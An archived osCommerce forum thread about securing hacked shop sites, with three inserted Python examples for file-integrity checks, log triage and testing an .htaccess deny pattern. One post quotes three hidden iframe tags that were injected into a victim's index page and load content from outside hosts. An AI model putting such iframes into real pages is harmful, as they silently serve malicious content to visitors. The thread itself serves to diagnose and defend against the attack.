
osCommerce


How to secure your osCommerce 2.2 site.


spooks


Sam please.....

 

If that patch covers the xxx.php/login.php what exactly does this one of FWR?

http://forums.oscomm...ost__p__1467014

I thought it was for this issue....

 

Regards

 

 

It is, as he stated in that post 'SCRIPT_NAME' is fine in most cases, but on some servers does not return the expected result, hence his code there.

i.e. it's most likely that the code above is all you need; a few servers will need the other though, test which works on yours.

Sam

 

Remember, what you think I meant may not be what I thought I meant when I said it.

 

Contributions:

 

Auto Backup your Database, Easy way

 

Multi Images with Fancy Pop-ups, Easy way

 

Products in columns with multi buy etc etc

 

Disable any Category or Product, Easy way

 

Secure & Improve your account pages et al.


Hi all,

 

I was looking at my stats yesterday and I'm getting unusual traffic from about 6 sites in China.

When I visit these sites, it's always a replica of my home page (for example www.siteXYZ.cn/catalog/). Now when I click on any link, it comes back to my site.

I've installed Security Pro and IP Trap, cleared my stats, but the referrers keep coming back.

 

Has anyone experienced that?

 

Thanks in advance for any input.


> When I visit these sites, it's always a replica of my home page (for example www.siteXYZ.cn/catalog/). Now when I click on any link, it comes back to my site.
>
> I've installed Security Pro and IP Trap, cleared my stats, but the referrers keep coming back.

 

 

 

Sounds typical of a hacked site (yours); why have you limited yourself to only a bit of security? You must apply all detailed in the OP for a fully secure site.

Sam

 


> Sounds typical of a hacked site (yours); why have you limited yourself to only a bit of security? You must apply all detailed in the OP for a fully secure site.

 

I'm adding everything but the kitchen sink as I type. Hopefully that will take care of it.


> I'm adding everything but the kitchen sink as I type. Hopefully that will take care of it.

 

 

The only trouble is if you're already hacked (as it sounds) that's too late; best option is to wipe the site & restore with a 'clean' backup, then add security.

No amount of security will stop hackers that have hidden back doors etc. in place.

Sam

 


> It has long been known the file manager is a security risk & should, nay MUST be removed; if used for editing your site it is likely to damage your files, so is a bad utility to keep anyway, see here. It's also been known it's a possible hacking route & to make matters worse there now exists a very nasty hack that uses the file manager to gain access to your site (dbase included!!)
>
> Use a normal editor such as html-kit or notepad++ after downloading all your files to your PC with ftp such as filezilla.

 

 

 

I know this is probably a crazy question but I'm a newbie to this. But if I use filezilla, do I download the file manager that is in my cpanel from my host or the osCommerce file manager? The reason I ask is I've had someone on a different forum say that we should NEVER mess with the file manager in osCommerce. And what is the difference in the file manager in my cpanel and the one in osCommerce??

 

Thanks


> I know this is probably a crazy question but I'm a newbie to this. But if I use filezilla, do I download the file manager that is in my cpanel from my host or the osCommerce file manager? The reason I ask is I've had someone on a different forum say that we should NEVER mess with the file manager in osCommerce. And what is the difference in the file manager in my cpanel and the one in osCommerce??
>
> Thanks

 

 

It's file_manager.php in admin that must be deleted, that one allows you to edit (and damage) files.

cPanel filemanager allows you to re-name / move / delete / chmod files. That's where you set permissions.

Sam

 


> The only trouble is if you're already hacked (as it sounds) that's too late; best option is to wipe the site & restore with a 'clean' backup, then add security.
>
> No amount of security will stop hackers that have hidden back doors etc. in place.

 

Thanks Sam and Withney for your input.

 

I've deleted; clean restored everything; changed passwords; renamed admin folder; removed file manager; implemented all the security add-ons. I still have the same sites displaying a copy of mine.

 

I pinged the sites and it returns my site's IP address. Turns out to be, according to my ISP and my tests, that a bunch of Chinese sites' domains are pointing to mine.

Why? I have no clue. Neither does my ISP.

 

So someone out there is registering domain names and pointing them at mine. Makes absolutely no sense whatsoever. Very very strange...

 

I tried to do some research to find out what would be the purpose of it but found nothing.

 

my site is 4wheelsautoparts dot com and two of the sites (out of about a dozen) are zn66 dot cn / feitian dot cc

 

Weird or what?


> I pinged the sites and it returns my site's IP address. Turns out to be, according to my ISP and my tests, that a bunch of Chinese sites' domains are pointing to mine.

 

The mapping of the domain name and the IP address is done by the DNS servers pointed to by the domain registrar, and these servers are typically managed by the hosting company (yes, there are exceptions like OpenDNS). So there is a chance that this is just a mistake, and that an email with the Chinese sites' hosting company can fix the problem.

Check out Chad's News.


> The mapping of the domain name and the IP address is done by the DNS servers pointed to by the domain registrar, and these servers are typically managed by the hosting company (yes, there are exceptions like OpenDNS). So there is a chance that this is just a mistake, and that an email with the Chinese sites' hosting company can fix the problem.

Thanks Chad for the input. I'll contact my Chinese friends to see if they can be of any help.


I'm sorry if this has been repeated. I have installed Site Monitor. When I go to Admin > configure, the set up page goes blank.

sitemonitor_configure_setup.php

 

I am not sure why it isn't working please help.

 

Thanks


> I'm sorry if this has been repeated. I have installed Site Monitor. When I go to Admin > configure, the set up page goes blank.
>
> sitemonitor_configure_setup.php
>
> I am not sure why it isn't working, please help.
>
> Thanks

Site Monitor Support thread link

 

If you install a contribution and it has an active support thread you need to use it.

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 


I have installed Security Pro, Sitemonitor, htaccess protection, anti xss, etc. All appear to be working. According to my host and my own testing, all permissions are 755 and less. I did not feel the need to use an IP trap or anything for ftp access as my individual IP is the only one allowed; all others are disallowed. Yet, on a daily basis an iframe will inject itself into the index page after <body>. There are no new scripts that I can find in any folders or any pages. The invisible files all seem appropriate. The iframe attacks include the following.

 

<iframe src=http://vip-stats.info/ts/in.cgi?2 width=0 height=0 frameborder=0></iframe>
<iframe src=http://test-id.biz/ts/in.cgi?2 width=0 height=0 frameborder=0></iframe>
<iframe src=http://id-tester.info/ts/in.cgi?2 width=0 height=0 frameborder=0></iframe>

 

My host has run multiple tests to see any security flaws, but come up with nothing. I have gone over backup versions scanning for possible inserts, but found nothing other than what I have modified. I have exhausted myself keeping up with the inserts as they happen once a day. I have yet to have any malware warnings, although eventually it will catch up to me as I will miss something. I have a freelancer that is going to look into what could be the problem, but my hopes for his success are low. Has anyone else had these specific iframe attacks? I know the vip-stats is fairly common. I was wondering if anyone has been attacked in this manner and what may have been the causing factor.

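As an added example (my own code, not from the thread, osCommerce or the Site Monitor contribution) of how a site owner can catch the kind of change described above without reading every file by hand: the script hashes a web root into a baseline manifest, reports files added, modified or removed since that baseline, and flags zero-width/zero-height iframes like the ones quoted. The web root, file names and the injected tag inside demo() are constructed for the demonstration.

```python
"""File-integrity check plus hidden-iframe scan (added example, not project code)."""
import hashlib
import re
import tempfile
from pathlib import Path

# Zero-size iframes are the classic "invisible" injection: width or height of 0.
HIDDEN_IFRAME = re.compile(
    r'<iframe\b[^>]*\b(?:width|height)\s*=\s*["\']?0(?![\d%])[^>]*>',
    re.IGNORECASE)

# Only files that the web server would render/execute are scanned for markup.
SCANNED_SUFFIXES = {".php", ".html", ".htm", ".tpl"}


def sha256_of(path: Path) -> str:
    """Stream a file through SHA-256 so large files do not need to fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: Path) -> dict:
    """Map every file (path relative to root) to its SHA-256; store this offline."""
    return {str(p.relative_to(root)): sha256_of(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def diff_against_baseline(root: Path, baseline: dict) -> dict:
    """Compare the tree as it is now with the saved manifest."""
    current = build_baseline(root)
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(k for k in current
                           if k in baseline and current[k] != baseline[k]),
    }


def hidden_iframes(text: str) -> list:
    """Return every zero-size iframe tag found in a page's source."""
    return HIDDEN_IFRAME.findall(text)


def scan_for_hidden_iframes(root: Path) -> dict:
    """Map each scanned file that contains hidden iframes to the tags found."""
    hits = {}
    for p in root.rglob("*"):
        if p.is_file() and p.suffix.lower() in SCANNED_SUFFIXES:
            found = hidden_iframes(p.read_text(errors="replace"))
            if found:
                hits[str(p.relative_to(root))] = found
    return hits


def demo() -> dict:
    """Constructed scenario: baseline a tiny catalog, then simulate the injection."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "index.php").write_text("<html><body>\n<h1>Shop</h1>\n</body></html>\n")
        (root / "includes").mkdir()
        (root / "includes" / "configure.php").write_text("<?php define('DB', 'x');\n")
        baseline = build_baseline(root)  # in practice: saved somewhere the web server cannot write
        # Simulated injection right after <body>, using the first tag quoted in the thread.
        (root / "index.php").write_text(
            "<html><body>\n"
            "<iframe src=http://vip-stats.info/ts/in.cgi?2 width=0 height=0 frameborder=0></iframe>\n"
            "<h1>Shop</h1>\n</body></html>\n")
        (root / "x.php").write_text("<?php echo 1;")  # a dropped file, also constructed
        return {"diff": diff_against_baseline(root, baseline),
                "iframes": scan_for_hidden_iframes(root)}


if __name__ == "__main__":
    print(demo())
```

Run it on a cron schedule against the live tree and keep the baseline manifest outside the web root; a "modified" or "added" entry you did not cause is the moment to pull the access log for the corresponding timestamp.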

Your host isn't "savvy" enough to examine the site access logs to find out where/how this is originating?

:unsure:


> Your host isn't "savvy" enough to examine the site access logs to find out where/how this is originating?
>
> :unsure:

I am not sure what you mean by access logs as my IP is the only IP that has access. This problem only started occurring within the last 2 weeks. I have a log of ftp IP addresses, but all access is limited to my IP or an IP of a freelancer, none of which have had access in 5-6 months.


> I am not sure what you mean by access logs as my IP is the only IP that has access. This problem only started occurring within the last 2 weeks. I have a log of ftp IP addresses, but all access is limited to my IP or an IP of a freelancer, none of which have had access in 5-6 months.

So the site isn't accessible from the internet (admin and catalog) to anyone but you?

:unsure:


> So the site isn't accessible from the internet (admin and catalog) to anyone but you?
>
> :unsure:

No, I was referring to ftp access, highlighting the fact that the admin folder is not named admin, the computer is well protected with antivirus (macosx), passwords have been changed, etc. Even then, the only file that ever shows a change is the index. If you are saying that my host should be able to tell me if someone is in my admin folder, and that just by somehow accessing the admin folder they would be able to insert code in the index, and only the index, without the filemanager.php, why would they only attack index? I agree that my host should be able to assist, but they cannot. They isolated two files that could be acting as shells, neither of which were.


If the site is being attacked from the outside, the answer is in the access logs.


> If the site is being attacked from the outside, the answer is in the access logs.

Well, the host had renamed a file from log to data and then placed the logs inside this. I found daily logs for the last 7 days. There are an average of 40,000 lines per daily log. This shows the IP, time, "GET", "POST" and "HEAD", and file or page. It seems like a difficult challenge to isolate an IP address that could be the root cause.


> Well, the host had renamed a file from log to data and then placed the logs inside this. I found daily logs for the last 7 days. There are an average of 40,000 lines per daily log. This shows the IP, time, "GET", "POST" and "HEAD", and file or page. It seems like a difficult challenge to isolate an IP address that could be the root cause.

I never said it was going to be easy.

 

When the index file is modified it leaves a timestamp when this happened.

 

Concentrate on entries in that timeframe.

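An added example (my own code, not Jim's or the host's tooling) of the triage he describes: parse access-log lines, keep only the entries in a window around the index file's modification time, drop obvious crawlers, and separate the requests that could have written a file from ordinary browsing. The log lines, the modification time and the list of crawler markers are constructed for the demonstration; a real Apache "combined" log has the same layout, and the parser also accepts the shorter "common" format.

```python
"""Narrow a 40,000-line access log to the minutes around a file change (added example)."""
import re
from datetime import datetime, timedelta, timezone

# Apache combined format; the trailing referer/agent pair is optional so common-format lines parse too.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
    r'(?: "(?P<referer>[^"]*)" "(?P<agent>[^"]*)")?')

# Constructed list of user-agent fragments to treat as crawler noise.
BOT_MARKERS = ("msnbot", "bingbot", "slurp", "googlebot")

# Constructed sample log (RFC 5737 documentation addresses); one IP logs in to admin and saves a file.
SAMPLE_LOG = """\
203.0.113.10 - - [12/Mar/2009:03:41:02 +0000] "GET /catalog/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
66.249.0.1 - - [12/Mar/2009:03:44:17 +0000] "GET /catalog/product_info.php?products_id=12 HTTP/1.1" 200 3301 "-" "Mozilla/5.0 (compatible; msnbot/2.0)"
198.51.100.7 - - [12/Mar/2009:03:45:30 +0000] "GET /catalog/admin/login.php HTTP/1.1" 200 2210 "-" "Mozilla/4.0"
198.51.100.7 - - [12/Mar/2009:03:45:58 +0000] "POST /catalog/admin/login.php HTTP/1.1" 302 0 "-" "Mozilla/4.0"
198.51.100.7 - - [12/Mar/2009:03:46:20 +0000] "POST /catalog/admin/file_manager.php?action=save HTTP/1.1" 302 0 "-" "Mozilla/4.0"
192.0.2.44 - - [12/Mar/2009:03:46:41 +0000] "GET /catalog/index.php HTTP/1.1" 200 5210 "-" "Mozilla/5.0"
203.0.113.10 - - [12/Mar/2009:05:10:00 +0000] "GET /catalog/index.php HTTP/1.1" 200 5210 "-" "Mozilla/5.0"
"""
# Constructed mtime of index.php (what `ls -l --time-style=full-iso` or stat would show).
INDEX_MTIME = datetime(2009, 3, 12, 3, 46, 25, tzinfo=timezone.utc)


def parse_line(line: str):
    """Return a dict for one log line, or None if the line is not in a known format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["time"] = datetime.strptime(entry["time"], "%d/%b/%Y:%H:%M:%S %z")
    return entry


def is_bot(entry: dict) -> bool:
    agent = (entry.get("agent") or "").lower()
    return any(marker in agent for marker in BOT_MARKERS)


def entries_near(lines, mtime, before=timedelta(minutes=10), after=timedelta(minutes=2)):
    """Parsed, non-crawler entries with a timestamp in [mtime - before, mtime + after]."""
    hits = []
    for line in lines:
        e = parse_line(line)
        if e and not is_bot(e) and mtime - before <= e["time"] <= mtime + after:
            hits.append(e)
    return hits


def triage(lines, mtime):
    """Group the window's requests by client IP and pull out the ones that can change files."""
    window = entries_near(lines, mtime)
    by_ip = {}
    for e in window:
        by_ip.setdefault(e["ip"], []).append((e["method"], e["path"], e["status"]))
    # Anything that posts data, or touches the admin area, deserves a closer look.
    writers = [e for e in window if e["method"] == "POST" or "/admin/" in e["path"]]
    return by_ip, writers


def triage_sample():
    """Run the triage on the constructed log and modification time."""
    return triage(SAMPLE_LOG.splitlines(), INDEX_MTIME)


if __name__ == "__main__":
    by_ip, writers = triage_sample()
    for ip, reqs in by_ip.items():
        print(ip, reqs)
    print("possible writers:", [(e["ip"], e["method"], e["path"]) for e in writers])
```

Feed it the real log with `open(path)` in place of `SAMPLE_LOG.splitlines()` and the file's actual mtime; widen `before` if the server clock and the file system clock are not in sync. Note that a GET from an innocent-looking IP in the window (the school districts in the thread) does not clear that IP: a compromised workstation there, or a stolen admin session, still shows up as ordinary browsing.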

> Add a .htaccess including the following code.
>
> php_flag engine off
> <Files ~ "\.(php*|s?p?html|cgi|pl)$">
> deny from all
> </Files>

 

I've taken a close look at the regular expression in this .htaccess code, and am thinking that it should be

php.*

instead of

php*

The code as it stands will prohibit files with an extension of ".ph", ".php", ".phpp", ".phppp", etc. But I think the intention was to prohibit any extension that begins with ".php" (such as ".php", ".php3", ".php4", etc.).

 

Am I wrong?

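An added example, not from the thread, that checks Chad's reading of the pattern by running the quoted expression and the proposed `php.*` variant over constructed filenames with Python's re module (Apache's `<Files ~ "...">` also performs a regular-expression match against the file name). The filename list is constructed for the demonstration.

```python
"""Compare which filenames each <Files ~> pattern would deny (added example)."""
import re

ORIGINAL = r"\.(php*|s?p?html|cgi|pl)$"   # as quoted from the .htaccess snippet
PROPOSED = r"\.(php.*|s?p?html|cgi|pl)$"  # Chad's suggested correction

# Constructed names covering the cases discussed: plain .php, .ph, .phpp, numbered
# PHP extensions, the html variants, cgi/pl, an image, and a double extension.
SAMPLES = ["index.php", "a.ph", "b.phpp", "c.php3", "d.php5", "e.phtml",
           "f.shtml", "g.cgi", "h.pl", "i.jpg", "j.php.jpg"]


def denied_by(pattern: str, names) -> list:
    """Names the pattern matches, i.e. the files the <Files> block would deny."""
    return [n for n in names if re.search(pattern, n)]


def compare(names=SAMPLES) -> dict:
    """Side-by-side view of the two patterns, including what only one of them catches."""
    original = denied_by(ORIGINAL, names)
    proposed = denied_by(PROPOSED, names)
    return {
        "original": original,
        "proposed": proposed,
        "only_original": [n for n in original if n not in proposed],
        "only_proposed": [n for n in proposed if n not in original],
    }


if __name__ == "__main__":
    for key, value in compare().items():
        print(f"{key}: {value}")
```

The run confirms the reading above: `php*` denies `a.ph` and `b.phpp` but lets `c.php3` and `d.php5` through, while `php.*` denies the numbered extensions. A side effect worth knowing is that `php.*` also denies double extensions such as `j.php.jpg`, which is the safer behaviour for an upload directory.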

> I never said it was going to be easy.
>
> When the index file is modified it leaves a timestamp when this happened.
>
> Concentrate on entries in that timeframe.

 

Well. The site was not attacked again until today. I caught it immediately (within 15 minutes of the modification). Looked through the log and other than an MSN and Yahoo bot, there were 3 IPs logged at the exact minute of attack. Unfortunately, each of these were easily traced back to school districts, which are a main purchaser from our site. These IPs did not match up to any other of the logs with attacks.

 

Is there any other way an injection could be occurring? As the log file tells me the attack did not seem to come from the outside, must I assume it came from within? I have stripped each folder down to bare bones, searching through every file, and have not found a single change that corresponds to a customization we did not develop. There was a few days' delay in this last attack, down from once every 12 hours. I was about to hire a professional to audit and cleanse the site and database, but my experience with freelancers has been sketchy. That is why I have been trying to figure this out myself.


Archived

This topic is now archived and is closed to further replies.
